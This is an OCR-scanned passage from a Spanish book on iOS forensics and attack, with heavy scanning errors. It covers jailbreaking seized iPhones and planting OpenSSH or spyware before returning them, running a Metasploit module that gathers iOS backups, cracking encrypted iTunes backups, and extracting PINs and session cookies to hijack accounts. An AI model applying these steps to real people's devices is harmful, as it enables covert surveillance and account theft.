Primero se mostrará la información del explo que se está lanzando, en este caso como es un chip 
A4 con iOS 6 se lanza el exploit de BootROOM limeraln. Después se parchea el kernel para quitar 
el Code-Signing. y por último se llega a las opciones de ejecución en el terminal, una vez que se ha 
conseguido hacer el Jailbreak. 


En este punto es posible ejecutar código con la cuenta de usuario root y el password alpine en el 
terminal. Para ello, es necesario erear un disco en memoria RAM con lo que se quiera ejecutar. 
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Please select your options for ones, 1_5,0_I0A403: 


F isal Cyde 
T isal custom bunde 
I Addaenvanon nicket 
P Deaclivate 


Imagen 03.13: Explotando límeraln para hacer el Jailbreak. 


erramientas de análisis forense de tipo comercial crean sus propios scripts a partir de este punto 
a extraer Lodo el contenido del terminal sin necesidad de tener el passcode, Otras herramientas 
mo Gecko iPhone Toolkit lanzan el ataque de fuerza bruta para sacar cl passcode, y sistemas como 
'hone Data Protection, corren todos los scripts para sacar las passwords, volcar datos, u obtener 
ja shell, tal y como se ve en el capítulo dedicado a este framework. 


uponiendo que no se disponga del passcode del terminal, se podria instalar Cydia que es la 
rramienta cliente que da acceso a la tienda de aplicaciones del mismo nombre para sistemas ¡OS 
n Jailbreak, pero nunca se podría arrancar ¡OS y llegar a instalar, por ejemplo un troyano desde 
Cydia, o un troyano utilizando un provisioning profile. 


ji por el contrario, el passcode ha sido posible sacarlo con Gecko iPhone Tholkit, ya no se necesitaría 
cer el Jailbreak, por lo que se estaría en la última opción. es decir, sin passcode es posible hacer 
sel Jailbreak porque es un chip A4 y lo que se quiere es tener acceso a los ficheros. En ese caso es 
"mejor lanzar ¡Phone Data Protection. 


La última opción que queda es crear un custom bundle, como hacen las herramientas forenses para 
lencr acceso al sistema, como por ejemplo con un troyano o keylogger y devolver el dispositivo a 
su dueño. 
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Custom bundle de OpenSSH 

Una forma sencilla de conseguir acceso al terminal sin tener el passcode es instalar OpenSSH sin 
instalar Cydia. Esto permitirá que se abra una nueva conexión al dispositivo por donde conectarse, 
aunque existe el problema de la conectividad con el terminal. 


Si el dispositivo tiene instalado un ¿OS 4.X, bastará con analizar cuáles son las redes Wi-Fi que 
busca, para crear una red señuelo a la que se conecte el dispositivo y desde esa red se podrá hacer la 
conexión al servidor OpenSS]1/ que se ha introducido. 


Si el dispositivo tiene un ¡OS 5.X o superior, esto no se podrá realizar, ya que el terminal no libera 
las passwords de conexión a las redes Wi-Fi hasta que no se ha desbloqueado una vez, por lo que 
la opción pasa por requisar temporalmente el terminal, hacerle cl .Jailhreak, instalar el OpenSSH 
y devolver dicho dispositivo a su dueño. La primera vez que se desbloquee el passcode y que se 
conecte a una red Wi-/'i quedará accesible para conectarse vía OpenSSH. 


Please select your options for iPhone, 1 6.0_104405: 


I Irsta Cyda 
[F install custom bunde 


T Add activation ticket 
[T Deactivate 


Imagen 03.14; Instalación de un custom bundie. 


El custom bundle de Open. 
en El fichero que hay que 
descargarse es SS//2_bundle.tg= y guardarlo en una cal c selecciona la opción de 
Install custom bundle desde Redsn0w se solicitará la ruta del fichero y quedará listo para ejecutarse 
en el siguiente reinicio. 


lisponible en el repositorio eros de ¿Phone-Dev Team 


Este proceso de instalar software en dispositivos A4 con custom bundle sin conocer el passcode, 
podría hacerse igualmente para introducir, por ejemplo, un malware especialmente creado para 
vigilar la actividad de los usuarios. 


Jailbreak a terminales A5 con ¡OS 5.X usando Absinthe 


La herramienta por excelencia para hacer jailbrek en dispositivos con chip A5 es Absinthe. Permite 
hacer tanto Tethered como Untethered Jailbreak, pero en todos los casos es necesario conocer el 
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passcode del dispositivo para poder hacerlo ya que como se ha explicado no utiliza exploits de 
BootRom, por lo que si no se tiene puede ser inútil requisar el dispositivo. 


Como se puede ver en la imagen siguiente, nada más descargar y ejecutar la herramienta se informa 
de este hecho. Después, cuando comience el proceso de „Jailbreak, la herramienta reiniciará el 
dispositivo, transferirá datos, y acabará realizando el Jailbreak. pero será necesario en todo momento 
que esté conectado cl terminal a iTunes y que no haya ningún passcode por lo que no se pueden hacer 
casas como las hechas previamente con RedsnOw y los custom bundles. 


Welcome to Absinthe 105 5.0/5.0.1 untethered AS jaibreak! 


Please make a backup of your device hafore usng this tool We don't expect any 
Í Issues, but we aren't responsble f anything happens. 


Phone 4S wth IOS 5.0.1 (9A405) detected. Cicx the button to begin. 


E 
Chronik-Dev Absinthe © 2011-2012 Chronic-Dev Team. 
Enpluits by: @pod2g, @pienetbeing, Gsaurk, 


@püskninja, @Mu: and 3 
Artwork by QIOPK. GUI by Hanéne Samara & Qoimskeks. 


Supoort Us (PayPal) http://greenpoison. comf 


Imagen 03.15: Absônthe para ¿OS 


Jailbreak a iOS 6 en dispositivos con chip A4, AS y A6 


La última herramienta que ha sacado la comunidad de Jailbreakers es Evasila. Esta versión hace 
Jailbreak en terminales con ¡OS 6 hasta la versión ¿OS 6.1.2. ya que cuatro de los seis bugs que 
explota fueron cerrados en esa actualización 


De nuevo, los exploits se encuentran en lo que se denomina userland, es decir, en el entomo de 
usuario por lo que es necesario contar con el passcode y desbloquear el terminal. 


Tanto los exploits que usa Absinthe para dispositivos AS con ¿OS 5, como los que usa Evasión para 
dispositivos con chips AS y A6 e ¡OS 6.X requieren conocer el passcode, por lo que solo pueden 
ser útiles para instalar software espía en el terminal o puertas traseras accesibles con OpenSSH en 
terminales que van a ser deyueltos a sus auténticos dueños. para conseguir monitorizar las acciones 
que realice en el futuro. 


Hay que recordar que, en el caso de dispositivos con chips A4 incluso con iOS 6 se puede seguir 
haciendo Jailbreak por medio del exploit de BoorRom, por lo que no es necesario hacer uso de 
Evasión para esos vasos. 
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5. Acceso a datos en el dispositivo 


Este punto explica cómo se puede acceder a los datos de un terminal en los casos en los que haya 
que coger un dato puntual o utilizar una herramienta de análisis forense profesional que los extraiga. 


Si se ha podido acceder al passcode mediante Gecko ¡Phone Toolkit el terminal se puede conectar 
a cualquier equipo con 4pple ¡Tunes, hacer un backup y analizarlo, o simplemente conectarse a él 
con cualquier herramienta que permita acceder al sistema de ficheros, como por ejemplo ¿FunBox. 


Astions View Language Panels Help 
New Folder Refresh 4 Go Up Level | Y Copy From PC P Copy To PC | Bl install App [AppFastin™] Q Serch Files M) 
View | Details 


Imagen 0: cookies binarycoskies de Linkedin accedidas con iFunBox. 


Ahi se podrían copiar los ficheros de binarycookies y preferences de la cuenta de Linkedin y utilizarla 
en otro dispositivo para acceder a la sesión del dueño del terminal. 


Si se ha instalado OpenSSH en el terminal o se ha descubierto que ya estaba instalado previamente, 
entonces se puede hacer la inspección de ficheros mediante un sistema SSHFS, es decir, montando 
un sistema de ficheros por encima de una conexión SSII. Se puede utilizar una herramienta como 
MacFusion, donde hay que configurar los datos que se necesitan para establecer la conexión. 


Imagen 03.17: Conexión SSH en MacFusion. 
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na vez establecida la concxión, se podrá montar el sistema de ficheros simplemente dando clic 
el botón de Montar, y ya quedará accesible toda la estructura de ficheros remolo a través de la 
amienta. ¿7 


iPhone (Mounted) 
mobilegs1 8.1 


Imagen 03.18: FS montado sobre concxión SSH 


último, si no se ha conseguido montar OpenSSH (o un troyano en el sistema) y no se ha 
seguido el passcode, lo mejor será devolver el dispositivo y esperar a tener más información, o 
alizar los esfuerzos en averiguar el passcode u obtener el equipo donde este terminal es parcado 
rmalmente. 
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Capítulo IV 
Atacando el backup 


1. Introducción 


En este capítulo se van a explicar los pasos que un intruso podría llevar a cabo para conseguir el mayor 
número de datos e información de un sistema con ¡OS, teniendo en cuenta que debe de disponer, ya 
sea porque se tiene acceso físico o porque remotamente se ha podido explotar una vulnerabilidad de 
configuración (por ejemplo una lista de permisos más configurada en la compartición de archivos 
de red), o de aplicación (por ejemplo un hug explotado con Metasploit), y se ha accedido al sistema 
operativo donde se encuentra instalada la aplicación Apple ¡Tunes desde la que se gestiona el 
dispositivo del objetivo, 


Esto es importante porque una de las características de Apple iTunes es llevar a cabo copias de 
seguridad cada vez que un terminal es conectado y sincronizado con el sistema operativo. Esos datos, 
que se almacenan en local, pueden cifrarse o no según la configuración que establezca el usuario 
en el interfaz de la aplicación, pero en cualquier caso supondrán una fuente jugosa de información, 
como se va a ver en este capítulo. 


Ruallzar copia de oeguridad automáticamente Realizar copla de seguridad y restaurar manualmente 
Dore alos una copa da engurid oni Pronn er anen orasnacor ©- 
astara una copia o seguridad almacer ada en dc tomma 
arde an ka una copia da seguridad doos caton más saia 
em gai erona. 


a A am e at ( Pesiar coom aters ] estar oop. | 


compita de su 


Imagen 04.01: Opciones de cifrado de Tunes. 


A 
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2. Localización de los ficheros del backup 


Cada vez que se produce una sincronización del dispositivo (ya sea iPhone, iPad o iPod Touch) los 
ficheros de la copia de seguridad son todos depositados dentro de un directorio que tiene de nombre 
el identificador del dispositivo. denominado UDID (Unique Device IDentifier), y en algunos casos, 
según la versión, también una marca de tiempo (Timestamp). Las rutas en las que se guardan estos 
directorios dependen del sistema operativo que esté utilizando el usuario, y son las que pueden verse 
en la siguiente tabla: 


sso0 Localización 
| Windows XP | %»HOMEPATE% Application Data Apple Computer MobileSynciWackup {UDID} 
Windows 7/8 %HOMEPATH%AppDatal Roaming Apple ComputerMobileSyne'Backupl[UDID) 
Mac OS. -/Library/A pplication Support/MabileSync/Backup/¿UDID; 


Poseer estos archivos compromete completamente la seguridad del terminal, ya que con las 
herramientas y los conocimientos adecuados, se va a poder acceder a casi toda la información que el 
terminal móvil contenga, e incluso, a datos guardados en servicios remotos o por aplicaciones que 
el usuario utilice en su día a día, como Whatsapp, acebook o Linkedin. 


Estos ficheros son tan relevantes que incluso aplicaciones de hacking, como el popular framework 
de explotación de vulnerabilidades Metasploit ha incluido, en su última versión, un módulo de 
postintrusión para Meterpreter, que busca en el sistema operativo comprometido los archivos de las 
copias de seguridad de ¿OS y los descargará de forma automática. „^, 


terpreter > run post/muri/gatheryapple ios backup 


(+) Checking for backups in C:\Users\admin\AppData\Roaming\Apple Ci 
ckup 
[[*] Checking tor backups in C:\usersyadmin.w7-u9127\AppoetayRoaming\ 


[b3108577339275514e1ed1552ce80218tedf 
[+] Pulling data from C:\Users\admin.W7-001274AppData\RoaningApple 
\Backup\2e6605a9fa92233dddcb37cc8068be93fedf fedt.. 
[=] Reading Manifest .mbdb from C:\Wsers\admin.W7-! ST ORDS ta OL a 
lobilesynciBackup' 2e6005a9fa32233dddrb37cc3668be33f 
[*] Reading Manifest.mbdx from C:Userstadain.W7-1 or erat iccn!| 
lcbileSynclBackup1Ze600529fa32233dddcb37ccaos8besifedftedf 

-es eltiempo.eltiespo Documents; 
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Utilizar este módulo es tan sencillo como invocar al script que realiza la búsqueda de los backups 
por todo el sistema operativo y que los descarga mediante el comando siguiente, tal y como se puede 
ver en la imagen anterior: 


A partir de ese momento, si se localiza un backup, el proceso será automático y descargará todos y 
cada uno de los ficheros localizados a la máquina local. 


3. Estructura de un backup de ¡OS 


El primer acceso a los ficheros que conforman la copia de seguridad de un dispositivo ¿OS puede 
resultar algo confuso la primera vez. Esto es así porque los archivos tienen como nombre un valor 
hexadecimal de 40 caracteres que corresponde a un Hash SHA1 del nombre del “dominio” al que 
pertenece cada uno de ellos, más el nombre real del fichero dentro del dispositivo, unidos los dos 
por un símbolo de guion. 


Por ejemplo, para el archivo de imágenes de la agenda de contactos, que se encuentra ubicado 
dentro del terminal en la ruta del sistema de archivos siguiente: 


Library/AdaresuBoox/Adc 


s300kImaces.sqlitedo 


Y que pertenece al dominio //omeDomaín, se tendrá como nombre de fichero dentro del backup de 
Apple ¡Tunes el resultante de aplicar esta función: 


SHA1 (“HomeDomain-Library/MdrevsBoox/AddressBookImages.sqlitedb*) 


Es deci, 


cd6702cea29le89 


230a76794405ab1779a088 


Para conocer todos los dominios posibles que existen en un sistema de backup de Apple iTunes 
se puede consultar el fichero /System/Library/Backup/Domains.Plist dentro del dispositivo, donde 
están todos ellos descritos. Por supuesto, estos son comunes para todos los terminales, por lo que 
se verá un poco más adelante como las herramientas automatizan la decodificación de los mismos. 


Estos ficheros, una vez decodificado el nombre del mismo, podrán estar o no cifrados dependiendo 
de lo que haya elegido el usuario. Sin embargo, dentro del backup hay otros archivos creados por 
Apple ¡Tunes en el momento de hacer la copia de seguridad con información general del sistema y 
que siempre están sin cifrar, independientemente de la configuración que se haya establecido, Su 
utilidad va a ser mucha, y son los siguientes: 


- — Info.Plist: contiene detalles del terminal como por ejemplo el modelo, el IMEI, las 
aplicaciones instaladas, la fecha de backup o el número de serie. 


- —Manifest.Plist: visto con anterioridad, mantiene detalles de las rutas de las aplicaciones 
instaladas. el número de serie. el tipo de dispositivo. UUID, e información referente a la 
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seguridad, como si el resto de archivos están cifrados o no y si el dispositivo solicita código 
de bloquco. 


Status.Plist: con información de la copia, como la hora al a que se realizó. si fue completa 
y terminó de forma satisfactoria y el UUTD. 


Manifest.mbdb: base de datos con información sobre el resto de ficheros y sus tamaños 
y estructura. Es el punto principal para mapear los nombres de los ficheros de la copia de 
seguridad y sus correspondencias dentro del sistema de ficheros de ¿OS. Su formato binario 
se describe en la siguiente tabla: 


Tipo Dato Descripción 

string Dominio Nombre del dominio. 

string |Ruta Ruta del fichero. 

string | Destino | Ruta absoluta para los enlaces simbólicos. 

aring (Hash Hash SHA1. OxFFFF para directorios y ficheros del dominio 
AppDomain. 0x0014 para los ficheros del dominio System. 

siring [Clave de cifrado | OxI FFF para ficheros no cifrados. 

TN EA Identifica el tipo de fichero. 0xa000 para enlaces simbólicos, 
0x4000 para directorios. Ux8000 para ficheros. 

uintó4 | número de inodo Número de inodo. 

uint32 | User ID UID del fichero, generalmente 501. 

uint32 | Group IP GUID del fichero, gencralmente 501. 

uint32 | Fecha de ult. mod Fecha de última modificación en formato Epoch. 

uint3? | Fecha de ult. acceso | Fecha de último acceso en formato Epoch. 

ninr32 Fecha de creación Fecha de creación en formato Zpoch. 

nint Tamaño Tamaño del fichero. U para enlaces simbólicos y directorios. 

uint | Protection Class Nivel de protección, desde 0x1 hasta 0xB. 

uint8 Núm de propiedades Número de propiedades. 7 

string | Nombre prop Nombre de la propiedad del fichero. 

string | Valor prop z Valor de la propiedad. 


El resto de archivos no se podrá leer de forma directa si la copia se hizo con contraseña y será 
necesario saber esta para descifrarlos y visualizar su contenido. A continuación se va a tratar este 


punto. 


Capitulo IV. Atacando el backup | 75 | 


Mir SupportedVersion</lkey> 
lestrongo3.0c/acring> 


<rey>ReychainDosain</hey> 

<dicr: 
<key>ManaçedPreferencesDomain</key> 

<dict> 

<keyoMediaDomainc/key> 


eyWirelesolomin q key> 
amic 

<> 

<key>Versionc/key> 

<etring>12.0<c/string> 
eráicr> 

plist> 


Imugen 04.03 Fichero Domains. plist. 


4.Crackear la contraseña de cifrado del backup de 
Apple iTunes 


Enel caso de que los ficheros de la copia de seguridad estén cifrados hay utilidades que irán probando, 
una a una, diferentes combinaciones de claves hasta dar con la contraseña de cifrado correcta. El 
proceso es muy lento pero es posible realizarlo aunque evidentemente existen factores que incidirán 
directamente en su éxito o no, como la contraseña elegida por el usuario, la configuración de las 
pruebas a realizar y la capacidad de cómputo que tenga el sistema de cracking elegido, para lo que 
se recomienda utilizar un potente sistema. 


Las dos aplicaciones más populares en el mundo de la seguridad para realizar esta tarea de cracking 
de la contraseña de cifrado del backup «on IRENE desarrollada por Zvan 
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Galuhev y y de distribución gratuita en Internet para uso personal y no comercial y Phane Password 
Breakeñde la compañía Elcamsofí, que es distribuida mediante licencias comerciales. 


En ambos casos la idea del eracking es similar. Se abre el fichero binario almacenado en el directorio 
del backup llamado Manifest.Plist, donde como ya se ha mencioado antes se almacenan propiedades 
conocidas de la copia de seguridad (como por ejemplo si el terminal móvil está protegido por 
contraseña | Was!"asscodeSer]. si está cifrado [IsEncrypted]) asi como la información necesaria 
para poder recuperar la contraseña, que es almacenada mediante una derivación realizada con el 
algoritmo PRKDF2 y 10000 iteraciones en los casos de ¡OS 4, ¡OS 5 e iOS 6. 


Con estos datos, las herramientas podrán comenzar a realizar pruebas hasta dar con la contraseña 
correcta de cifrado. 


E 
e AliOS 4.x Ax bad 
«cazan 5x b6 badi 
rueCrypt vokames (imtas supo; 
ERAS orders: 
Yus can lund mora information about ts program at deveiape”’s wehrte. 
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ou kyc hv wien cacembler CPU optimizations with al moden ara sets 
arpar? (AVX, XOP, AES-ND); 
Support for wde range cf GPUs -NVIDIA and 
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Imagen 04.04 /G 5 Password Recovery Suite. Imagen 04.05 Elcomsafi Phone Password Breaker. 


Desde el punto de vista de un auditor, los pasos parar averiguar la contraseña mediante ZG $ Password 
Recovery Suite son muy sencillos: 


- Se extraen los bytes necesarios del Manifest.Plis1 a un fichero externo que interpretará 
la aplicación. Este paso lo hace automáticamente la utilidad, por lo que tan solo hay que 
indicarle la ubicación del archivo original y dónde se guardará el nuevo. 


- Se selecciona el tipo de ataque de fuerza bruta, donde lo normal será utilizar uno o varios 
diccionarios. Esto es lo conveniente ya que el algoritmo PBKDF2 está diseñado para ser muy 
lento en el proceso de cracking y hará que probar todas las combinaciones posibles prolongue 
el proceso de descifrado de la contrascña durante años. 
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- Se añaden los diccionarios de palabras y las reglas de mutación de los mismos, de tal 
forma que por cada palabra del fichero se deriven a otras muevas más complejas que pudiera 
haber construido cl usuario. Para este propósito, en la página web SkullSecuritv se mantiene 
una lista de archivos de diccionarios para descargar que pueden ser de mucha utilidad. La 
URL de descarga es la siguiente Aupmmskullsecuriororgówiki/indexphp/Passwords $ 


Imagen 04.06 Selección de tipo de ataque de fierza bruta. Imagen 04.07 Selección de diccionario y reglas, 


Si se recorren todos los ficheros y tras haber creado con la herramienta todas las derivadas no se 
encuentra la clave de cifrado, entonces se debe ir añadiendo complejidad al ataque utilizando otros 
diccionarios y otras reglas de derivación, evitando en todo momento repetir ficheros con las mismas 
palabras que intentos anteriores para no realizar trabajo doble en el ataque. 


Imagen 04.08 Contraseña recuperada con 705 Password Recovery. 


5. Descifrado de los ficheros del backup de Apple 
¡Tunes 


Una vez identificada la clave que el usuario ulilizó para cifrar todos los datos del backup de iOS, el 
siguiente paso será proceder a descifrar todos los ficheros que componen la copia de seguridad del 
terminal, que se guardan cifrados con el algoritmo AES256-CBC. Una herramienta gratuita para 
descifrar todos los ficheros dejándolos tal y como lo haría Apple ¡Tunes si no estuviera establecida la 
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contraseña, es el script programado en lenguaje Python llamado “backup: tool. py, que se encuentra 
cntre las utilidades de mo es obvio, para usar este script se debe conocer 
previamente la contraseña de cifrado de los archivos que se ha tenido que averiguar con alguna de 
las herramientas citadas anteriormente y que han sido diseñadas para este propósito. 


> soaseamisoo 
iphones, 1 


"riting Docurents/wer_evernote ceazaranost/Syrestate 

ting Library/Modla/3461344288885 .uhatsapp.r2U //0/ /0T4019ab78dcó1cedsfada175028| 
Writing Lbrary/Medis/346281321258s uhatsapp.r=t/0/6/000bc0929ce70935023a0e7ae1175| 
ad 
ritina Nedis/PhotostreamsData/153784969/.NTSC/B188cbe1-52390856-2dcedð6d-böbat 304- 


ting Media/PhotoStrezesData/151 
[riting LADrarymentnj sanani s1913-235219735783.5/3/0/34415 


Imagen 04.09: Script backup_toolpy del conjunto de herramientas iPhane-dataprotectian. 


Para procesar cl archivo Manifesi.mbdb y navegar entre los ficheros de la copia de seguridad más 
cómodamente, como si de un explorador de archivos se tratara, existen herramientas que recorren 
los registros y los muestran de forma amigable. Una de estas utilidades muy populares para sistemas 
de uso gratuito. 
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Imagen 04.10: ¡Phone Backup Browser sobre copia de seguridad. 
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— E 
6. Análisis de ficheros de un backup de ¡OS 


A partir de este momento las opciones para un pentester se multiplican. Es cuestión de paciencia y 
dedicación el ir analizando todos y cada uno de los archivos guardados en el hackup. Este proceso 
es más similar al trabajo que realiza un analista forense. y que como se verá en otro capítulo puede 
tener herramientas de análisis profesionales, como ero un pentester puede hacer 
un trabajo rápido centrándose en los tipos de ficheros más importantes del backup. 


Tipos de Ficheros principales 

En general exislen pocos formatos de ficheros dentro de un backup de ¡OS que sean de interés. 
Allí es posible encontrar archivos multimedia de imágenes, videos, etcétera, de bases de datos en 
formato SOLite que utiliza lanto el sistema operativo como muchas aplicaciones populares, ficheros 
property list (Plist) y una gran minoría de otros tipos de archivo de texto u otro tipo usados por 


aplicaciones o como almacén de documentos. Los tipos más importantes son: 


Aplicación 


Archivos 


Configuración de 
Accesibilidad 


Library/Preferencesícom.Apple.Accessibility.Plist 


Modo avión, Bluetooth 
y Wi-Fi 


Library/Preferences/com.Apple.preferences.network 
Library/Preferences/com.Apple.network.capelient.tls. 
TrustExceptions.Plist 
SystemConfiguration/com.Apple.network.identification.Plist 
SystemConfiguration/ícom. Apple. Wi-Fi.Plist 
SyslemConfiguration/preferences.Plist 


Library/Calendar/* 
Library/Preferences/com.Apple.mobilecal* 


Calendario 
mE 


Library/CallHistory/* 


Reloj 


Library/Preferencesícom.Apple.mobiletimer.Plist 
Library/Preterences.com.4pple.preferences.daletime. Plist 


Contactos 


Library/AddressBook/* 


Nombre del dispositivo 


SystemConfiguration/som. Apple mobilegestalt 


| Pacelime 


Library/Preferences/com.Apple.conference* 


Atajos de teclado 


Library/Keyboard/+ 


Lenguajes de teclado 


Library/Preferences/.GlobalPreferences.Plist 
Library/Preferences'com.Apple.Preferences.Plist 
Library/Preferencesícom.4pple.purplcbuddy.Plist 


Servicios de localización 


Library/locationd/* 
Library/Preferences'com.Apple.locationd.Plist 
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Aplicación 


Archivos 


Mapas 


Library/Maps/* 
Library/Preferences/com.Apple.Maps.Plist 


Configuración de música 


Tibrary/Preferences/com.Apple.mobileipod.Plist 


Notas 


Library/Notes/* 
Library/Preferences/com Apple,mobilenotes.Plist 


notificaciones 


Library/BullitenBoard/* 
Library/SpringBoard/Push5tore/* 
Library/SpringBoard/applicationstate.Plist 
Librarv/Preferences/com.Apple.springboard.Phst 


¡ Camara Roll 


Medis/DCIM/* 
Media/PhotoData/* 
Library/Preferences/com.App/e.mobileslideshow.Plist 


Disposición de iconos de 
aplicaciones 


Library/SpringBoard/IconState.Plist 


Configuración de 
restricciones 


Library/ConfigurationProfiles/PublicTnfo/E NectiveUserSetings. 


Plist 
Library/ConfigurationProfiles/UserSettings.Plist 
Library/Preferences/com.App/e.springboard. Plist 


Safari 
Safari favoritos (en 
iconos de pantalla) 


Library/Cookies/Cookies.binarycookies 
Library/Safari/* 
Library/Preferences/com.4pple.WebFoundation.Plist 


Library/WebClips/* 


Siri 


Library/Preferences/com.Apple.assistant* 


Configuración de SMS, 


Library/Preferences/com.Apple.imservice* 
Library/Prefcrences/com.Apple.madrid.Plist 


e ES y Library/Preferences/com.Apple.MobileSMS. Plist 
3 Library/SMS/* 
r ibrary/Přefe h z a Ph: 
Sonidos Library/Preferences/com.Apple.preferences.sounds. Plis? 


Library/Preferences/com.Apple.springboard.Plist 


Mensajes de voz 


Media/Recordings/* 


Fondos de pantalla 


Library/SpringBoard/LockBackground cpbitmap 
Library/SpringBoard/LockBackgroundThumbnail jpg 
Library/SpringBoard/HomeBackeround.cpbitmap 
Library/SpringBoard/HomeBackground 'humbnail. ¡pe 


Clima 


Library/Preferences/com.Apple.weather.Plist 
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Análisis de Ficheros SQLite 

Las bases de datos SQLite son un estándar en cualquier dispositivo móvil, ya sea ¡OS o Android. 
Estas bases de datos se caracterizan por estar optimizadas para ocupar poco espacio, estar formadas 
por tan solo uno o dos ficheros y ofrecer la versatilidad del lenguaje SQL a los desarrolladores de 
aplicaciones. 


Por todo ello es muy común detectar un elevado número de este tipo de archivos en la copia de 
seguridad de un terminal ¿OS, ya que la gran mayoría de aplicaciones almacenará datos en ellos, 
incluidas las aplicaciones del sistema operativo iOS, como por ejemplo las siguiente: 


Contenido iOS | Nombre del fichero Nombre del backup 
SMS La 1-4 | sms.db 3d0d7eStb2ce288813306e4d4636395e04723428 
Contactos 1 A AddressBook.sqlitedb | adb8c77534444e97c31/11 59244503 0d 11b43b1 
Contactos 2-4 AddressBook.sqlitedb | 31bb7b28914766d4bas0d6dfb6113c08h614he442 
Calendario [1 |Calendarsqlitedb | IdeeBcde3eGe022039911210246e1c92b74K8940 
Calendario 2-4 | Calendar.sqlitedb 2041457451c04d39d04b481178355df678106858 
Notas 1-3 | notes.db 740b7eat93d6ea50305e88bb034908e9613118c3b 
Notas [4 notes. SQLite ca3bc05644da0bb188b5/b3be254/3b71470639 
Hist. de llamadas 1 call_history.db a49bfab36501belbt563c1d1813b05efd6076717 
Hist, de llamadas 2-3 |call_history.db 113242609491 11b210449ccddb50c89c3699478 
Hist. de llamadas |4 call_history.db 2h2h0084a1bc325ac8c27afdfl4atb42c61a19ca 
Localización 4 j consolidated.db ] 4096c9ec67612847dc283405900e284a70815836 
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Para visualizar el contenido de las bases de datos existen múltiples herramientas para cualquier 
sistema opcrativo que pueden ser utilizadas. Desde la propia página oficial de SQLite hacen un 
inventario de ellas por lo que hay múltiple variedad donde un usuario puede elegir. Una de estas 
herramientas es SOLite Administrator, que tiene un aspecto como el que se puede ver en la imagen 
anterior. Este tipo de utilidades se conectan a través del lenguaje SQL. a los ficheros 5QT.ite, por lo 
que muestran la información contenida dentro de las tablas y no dentro del fichero, ya que puede que 
haya más datos dentro de los archivos SOLite que los que se ven en las tablas. 


Estos archivos de SQLue tienen un formato muy similar al de un sistema de ficheros de un 
sistema operativo al uso. en el que se utilizan índices que apuntan a los datos reales (los registros) 
almacenados dentro de él. Cuando un elemento de una tabla es eliminado lo que se modifica es el 
registro y no el dato. por lo que en ocasiones cabe la posibilidad de rastrear cl archivo SQLite a nivel 
de bits y encontrar incluso información eliminada de la base de datos, lo que puede ser de extrema 
utilidad con los datos más sensibles. 


Editando el fichero con un editor hexadecimal sería más que suficiente para ver cadenas de texto 
pérdidas dentro del fichero de datos, aunque hay opciones más visuales y eficaces como el servicio 
RecoverMessages.com, gue permiten el procesado automático desde una página web para recuperar 
todas esas cadenas de forma estructura y visulamente cómoda. 


Imagen 04.12: Características que puede recuperar Recover Messages. 
Ll servicio RecoverMessages actualmente procesa bases de datos SOLite de aplicaciones como 


Whatsapp., Tuenti Movil, Line o SpotBros. En la siguiente imagen se puede ver cómo se recuperan 
conversaciones borradas de Whatsapp. 


Imagen 04.13: Captura de conversaciones de Whatsapp realizadas por Recover Messages. 
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álisis de ficheros Plist 


archivos Property list (Plist) organizan datos de forma estructurada. Generalmente son utilizados 
mo ficheros de configuración y se distribuyen con dos formatos distintos: en XML y en binarios. 


listintamente del formato de su contenido. es aconsejable usar una herramienta que ayude a 
bajar con ellos, ya que en ocasiones pueden ser de gran tamaño y complejos de tratar. Por otra 
:, estas utilidades también facilitarán la conversión a XML de aquellos Plist que sean binarios 
strándolos de la misma forma que si fuesen XM! 


ist Editor es una aplicación gratuita (de uso no comercial) para Microsoft Windows que soporta 
bos formatos, permite hacer búsquedas, minimizar grupos de etiquetas y revisar la sintaxis antes 
guardar un archivo modificado. 


T <hml version="2-0" encoding="0=7-8"2> 
2 <!DOCTYPE plise PUBLIC =-//Apple//DTD PLIST 1.0//2N" "htep:// 
3 =epiist version="1.0"> 
4 eraic 
s <key>BackupStato</key> 
€ <acringanawe/snring> 
7 <key>Date</xey> 
e <date>2012-12-22722:35:292</data> 
s <key>IsFullBackup</key> 

10 <fala0/> 
n <tey>SnapshotState</ tey» 

12 <atring>tinished</string> 

13 <koy>UUID</keyo> 

1 4mzring>S62A9989-B122-4226-B573-B2(C0999999</wering» 

15 <key>Versiont/rey> 

16 <string>2.4</string> 

io an» 


</pliac> 


Imagen 04.14: Aplicación plist Editor. 


tro de un archivo Plis? se pueden encontrar códigos PIN de seguridad, nombres de usuario, 
reos electrónicos, permisos e incluso contraseñas, por lo que la revisión debe ser exhaustiva y 
eticulosa, en especial, en aquellas aplicaciones más relevantes. 


'n ejemplo de esto se encuentra en el PIN que un usuario puede establecer para acceder desde su 
inal ¿Phone a Dropbox. Este código PIN se encuentra dentro un fichero Plist llamado com. 
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getdropbox.Dropbox.Plist almacenado en la carpeta de la aplicación. Basta con acceder a él con un 
editor de ficheros Plist y obtenerlo. 


AS 
«dao 


<Jdarar 
<kay>DropbozDocilftear-/11-17/2ur0tacrura Alesandro Danos Fraile-é| 
drralr0.0e/ranto 

(kryrDrophazDocottset-/Seytaulc/backup. raz«/zey> 

<real>0 0</real> 

<hayPDrepboxDocOt£oct=/iFhone inero.p 


akay DropbortassCodo" /key™ 
xingo 39897 /20x 
Stats» 
DropbortasscodcioquircIeacdiaccly0nàctive</key> 
g> 
«Key DrcpboxPhotoDpLcads3oLder=/key> 
<coringo /0/coxing> 
Cacha uba < hey 


Imagen 04.15: PIN de la aplicación Dropbox almacenado en un fichero plis? del backup. 


Análisis de binary cookies 


Al igual que en los sistemas operativos de escritorio. en los terminales iOS se guardan cookies de 
sesión, tanto la de los navegadores como Apple Safari o Google Chrome. como la de las aplicaciones 
que funcionan usando servicios web, como son la inmensa mayoría, por ejemplo: Facebook, 
Dropbox, Google Maps, etcétera. 


A diferencia de los navegadores web, las cookies de sesión de aplicaciones que utilizan web services 
son guardadas en archivos binarios y no se pueden leer transparentemente. Estos ficheros tienen 
la extensión “binarycookies”, y están compuestos por páginas. que a su vez se forman mediante 
registros con los datos de cada cookie. 


Como no existe documentación sobre cómo se genera un registro, se han obtenido los campos más 
relevantes mediante ingeniería inversa, que son los siguientes: 
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Dato Tamaño 
Tamaño de la cookie 4 
Desconocido 4 
Atributos: 
0x1 secure 


0x4 httponly 
0x5 secure+httponly 


Desconocido 
Direccionamiento de la URL 
| Direccionamiento del Nombre 
Direccionamiento de la Ruta 
Direccionamiento del Valor 

Final de la cookie 


loja ajafeaje 


Fecha de expiración 
Fecha de creación 

URL (termina con null) 
Nombre (termina con null) 
Ruta (termina con null) 
Valor (termina con null) 


Z|Z Z|Zjo 


Los fic! inarycookie se pueden convertir e imprimir a texto plano con el script en 
desarrollado por Satisb38En ocasiones, estas sesiones son válidas y 
